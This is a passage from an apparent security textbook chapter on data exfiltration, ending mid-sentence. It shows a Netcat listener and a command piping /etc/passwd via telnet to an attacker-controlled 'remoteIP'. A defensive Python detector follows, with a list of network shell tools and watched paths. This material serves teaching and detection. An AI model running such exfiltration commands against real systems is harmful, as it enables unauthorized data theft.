The unauthorized transfer of digital data from any environment is known as exfiltration of data (or extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
First, we will discuss some easy techniques to quickly grab files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat on the attacker-controlled system by running

    nc -lvp 2323 > Exfilteredfile

and then run

    cat /etc/passwd | telnet remoteIP 2323

from the compromised Linux server.
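Both halves of this transfer leave recognizable process command lines, which is what a defender can look for in process-audit or shell-history data. The following is an added example, not code from the original text: the sample lines, the address 203.0.113.10, the watched path prefixes and the function names are constructed assumptions.

```python
import os
import shlex

NET_TOOLS = {"telnet", "nc", "ncat", "netcat"}   # plaintext TCP tools
LISTENERS = {"nc", "ncat", "netcat"}             # tools that accept -l (listen)
WATCHED_PREFIXES = ("/etc/", "/root/", "/home/", "/var/")  # assumed watch list

def classify(cmdline):
    """Return 'listener-to-file', 'file-to-network', or None for one command line."""
    try:
        # Split on '|' and tokenize each stage (pipes inside quotes are not handled).
        parsed = [shlex.split(p) for p in cmdline.split("|") if p.strip()]
    except ValueError:                           # unbalanced quotes: cannot parse
        return None
    for i, argv in enumerate(parsed):
        if not argv or os.path.basename(argv[0]) not in NET_TOOLS:
            continue
        tool = os.path.basename(argv[0])
        flags = "".join(a[1:] for a in argv[1:]
                        if a.startswith("-") and not a.startswith("--"))
        # Receiving side: listening Netcat whose output is redirected to a file.
        if tool in LISTENERS and "l" in flags and any(a.startswith(">") for a in argv):
            return "listener-to-file"
        # Sending side: an earlier pipeline stage names a watched local path.
        upstream = [a for prev in parsed[:i] for a in prev[1:]]
        if any(a.startswith(WATCHED_PREFIXES) for a in upstream):
            return "file-to-network"
    return None

def scan(lines):
    """Return (line, verdict) pairs for every command line that was flagged."""
    return [(l, v) for l in lines if (v := classify(l)) is not None]

# Constructed sample command lines (not real telemetry).
SAMPLE = [
    "nc -lvp 2323 > Exfilteredfile",
    "cat /etc/passwd | telnet 203.0.113.10 2323",
    "cat /var/log/syslog | grep error",
    "telnet 203.0.113.10 23",
]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE):
        print(f"{verdict:18} {line}")
```

The check covers only the pipe form shown here; a rule set for production use would also need to consider input redirection and other transfer tools.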
Another important and fairly simple technique used by attackers with access to any system on the network is to run...